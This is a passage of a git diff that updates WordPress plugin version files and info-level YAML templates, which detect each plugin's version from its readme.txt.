a/helpers/wordpress/plugins/wp-rollback.txt +++ b/helpers/wordpress/plugins/wp-rollback.txt @@ -1 +1 @@ -1.7.3 \ No newline at end of file +2.0.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt index be4cea5e2b..c8357abfec 100644 --- a/helpers/wordpress/plugins/wp-seopress.txt +++ b/helpers/wordpress/plugins/wp-seopress.txt @@ -1 +1 @@ -7.2 \ No newline at end of file +7.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-sitemap-page.txt b/helpers/wordpress/plugins/wp-sitemap-page.txt index 7b0231f53b..70b02ffc1b 100644 --- a/helpers/wordpress/plugins/wp-sitemap-page.txt +++ b/helpers/wordpress/plugins/wp-sitemap-page.txt @@ -1 +1 @@ -1.9.3 \ No newline at end of file +1.9.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-smushit.txt b/helpers/wordpress/plugins/wp-smushit.txt index d0adf2c9ce..afb053553c 100644 --- a/helpers/wordpress/plugins/wp-smushit.txt +++ b/helpers/wordpress/plugins/wp-smushit.txt @@ -1 +1 @@ -3.15.1 \ No newline at end of file +3.16.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 0f8f73ca84..6440e66468 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.2 \ No newline at end of file +14.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-super-cache.txt b/helpers/wordpress/plugins/wp-super-cache.txt index 169f19b490..6f165bc1b0 100644 --- a/helpers/wordpress/plugins/wp-super-cache.txt +++ b/helpers/wordpress/plugins/wp-super-cache.txt @@ -1 +1 @@ -1.11.0 \ No newline at end of file +1.12.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-recaptcha.txt b/helpers/wordpress/plugins/wpcf7-recaptcha.txt index e1df5de7ae..b000a6a063 100644 --- a/helpers/wordpress/plugins/wpcf7-recaptcha.txt +++ b/helpers/wordpress/plugins/wpcf7-recaptcha.txt @@ -1 +1 @@ -1.4.4 \ No newline at end of file +1.4.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpcf7-redirect.txt b/helpers/wordpress/plugins/wpcf7-redirect.txt index 13d683ccbf..97ceee1b9f 100644 --- a/helpers/wordpress/plugins/wpcf7-redirect.txt +++ b/helpers/wordpress/plugins/wpcf7-redirect.txt @@ -1 +1 @@ -3.0.1 \ No newline at end of file +3.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index e6995d7ff6..75632c69da 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.8.4.1 \ No newline at end of file +1.8.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wps-hide-login.txt b/helpers/wordpress/plugins/wps-hide-login.txt index c70654ddb0..f868675320 100644 --- a/helpers/wordpress/plugins/wps-hide-login.txt +++ b/helpers/wordpress/plugins/wps-hide-login.txt @@ -1 +1 @@ -1.9.9 \ No newline at end of file +1.9.16.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpvivid-backuprestore.txt b/helpers/wordpress/plugins/wpvivid-backuprestore.txt index af89f09036..df9d20d6e7 100644 --- a/helpers/wordpress/plugins/wpvivid-backuprestore.txt +++ b/helpers/wordpress/plugins/wpvivid-backuprestore.txt @@ -1 +1 @@ -0.9.93 \ No newline at end of file +0.9.102 \ No newline at end of file diff --git a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt index d558367c43..aebeef10b5 100644 --- a/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt +++ b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt @@ -1 +1 @@ -3.27.0 \ No newline at end of file +3.35.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 19c7fecb19..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c65ecba1a87b2d94ccf4c83c302e8141bedfa6b680decb8b4a258f9d970c0c3a022059bec612568cf9cd4ff4b824d03a6218f9c008e744481cab94c1fbe4684c0eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8ba6c8c3ed..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b9e0681341d8925401ad5c30e7d5d3e96ea27aac29f2078b0fefebd3f1db84b022100fa7f3531549d5454a35af7df7be0592ffed808c87589e976e620e4a4f36586e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index d64fa54489..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e7c54fe180726a1c3cf0c7c0af0c6eadf5f2196e958ad2a3ff1e63351ce5598c022024ae3f0fda8c51593c57fbb2dd0ae64dd71846bb480b1dbf805ff39b02b83c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index f661fd8d83..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048cf4c862b932f084499f8f89db0956bdbbe22115d424e51d23176ec64eb63eb0221009ce5d4f5878df61ef3d566898c04205a5aa85068933dd5b0f49489132a8466aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 8aea420d22..f68ad2a6bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c9ca66877cfe93fbac643a61865e6a96c397cd64cd40a2180eaf1963e77acb11022100e4ab1e60decfcfbbe5b2066e6784e964e808a011821005058517fa71bcd9703e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 0678000ff3..196cc7e8e8 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -1,19 +1,19 @@ id: wordpress-all-in-one-seo-pack info: - name: All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic Detection + name: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b2f096c8924484e07ea853b51aee095d6bb3526b2cee555078c79f45f85e9a5b02203bb660fe4a0d0e3a97a0d4d509edba66e5a43004a6fd1ebdf93fa0a58b82b5ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 59538fa0e9..55362630df 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -1,19 +1,19 @@ id: wordpress-all-in-one-wp-migration info: - name: All-in-One WP Migration Detection + name: All-in-One WP Migration and Backup Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c78f5e80450da8c892e949a536468ea2211b254cca31119c1d1589597b18f0f5022060088bd94518e071a9ca9fdcb5bbc9939078ccb641b3dd47ed4c633ce5224491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index a421753033..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022067aa8a3438efeb0159c993435107cd5d8db8a2e9de6a508163d7f6d57a844073022100d77f5629b12cb8b1d4c73f089ba7cf8f35a05f1c156111cfba698bc69dff4f16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index b80056f008..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440221008730c6a1aa838ed25d6055c2a097cb2638df2e7306c29381157e77c6524a6a67021f38befd56549b7b6edb197632dcd7f176f48dabfd3850b96397035eaa5e9d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index e118dfc0a8..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204152d262fff64485c53d50560a75023aab3defa6a9a6537e91629c90f7775307022061dea93c2c763ee436742eddd5764a6449599f76d31ab78879d9983d02f209c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index a97e883214..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a0b5d8152e91feea312066fac5fa3ce7c96d6840efe8813f3b4b35d4a60329802207e155afabe6daa980ff0f6f2bd9ac43b65fdb66955f251cefdb63b565fccbaaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index b8c8aa2045..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201fc2dc1a1e0775e3dca7c8f3c92535517ddb44b31f41ec26d11f800c854f28380221008269ba3db784c9de2f874922df0f7d0c3ac4b8a28086db03a5f23b4536f679ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index c688bc0a6f..0ed608cd92 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e815d0cc4957e8b55c0b8fce0f8be9eaa7e5796b300737ecee4ffd385f926822022046f27b8c1a1748d4e01d51025b3ef5275dfdb9e4fa61f8a4ac0cd4d34078cf79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 15973a20fd..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e97ac05255d67298eca15497df6e0e58a908583372e959daf780fac66628200302210082ff65e9b39d679b1d06cce1f3e20046e59b80a45ba55dd772cbe8dfd89fab9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 2b2bd7c8ad..d1e01c329b 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc0717004994d16355e3349c6924cda2c23d8a2c206a82c25f833d19edba89e902207ce76225b045f98c6bc256f0e122dd9e58cf138314318e8e42415f98f54e4d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 1e603d9a9f..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d2609d2fabe965552f4de2f348e2183db03fa4fad2be368cc86a52c71dcf946202205fd0e40b95e19136b9163e9f81d6e8b301cfdb12023488799be0311df88bb490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4607ca09de..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd2f752252766914613e5829e36eb19d208beb1dcf012f78db356754e49d9f1202203865b77ce46b665bc1de3252b5e1ed148ab89b5df49213a6ec7f876b7894503c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 66baecfa94..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/breeze/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205874e6472bc7403a5a6e1e50aa61fba0f7ad98ba87d7cb81fd10e67b90a42bae02203df3cc2f018761a4299d51e720cf2a9759c79beccdfce0db6d9b025ff13bd5a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index df954401df..f3aae5f624 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033bc3ab6ec30081ef69a3c90293c457bc89442f3638f5cb6572bf1e10ecd4e19022100c5e53b8863febcf323a3e5d0e047c188ee477595f443c7fe3ea756e545c740ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index d19912ae10..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e98dd468a62e8768d87cef35610a1e020108bb4bedab9ba26d8b6797d4743238022100d9dc4dead9d61ba08e97667952e2e04c5099fa3f1dc93469616a8ce2317581e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 17315ca430..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207416dbd4e333276c46d81385dcfee15d7de1f193e32e086090512330eed7649f02204f902148c675431ed8e46375de267e638266680e4b5425fbe9b467ae20cf31a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 520d0b82f1..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b386badf2c6b08db33cddf111d34bbebe03b776a97028d75376b231ea8d817e702205d4cf06b87eb95984811ddc20513f9ec23fb1c60ba9e7de8867cd4816b356b68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index d16c5dbbbe..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d54026abc34463ce05cf7716f642dac1f9d1abc546fc765fdac4c3d242a4dcdc02207b76827c79b65682065d50a2876f053011fc914fcc345f48bae7c8615b8fa355:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index fe7c680680..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210091950a9818bd8012fbdcbeede025e4b65cf2b94a5b2c099260cafe3edc2aa7c4022100f8f954844f6704994d68228fb63168b5b92d2a61823abc551b612119e0971bc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index eeb1ea1358..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206eae0cf4733b63610bab25a976ae35067e6bb5509c025d898dc368abc520272b0220621814216f0fefd09e2ccf68c89bd56dadadf313569a6a4f58a7664a5c6e81e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 9f55f19a39..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202fff43249f19f7c75ba483b15e38bd25781bd80240810ec26649dc0ec0f3150f022100eefbf55ce26e7027016c8585d27e04c17d2ac78eec222785e43fa0cb11d19e49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 2461534156..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,13 +7,13 @@ info: reference: - 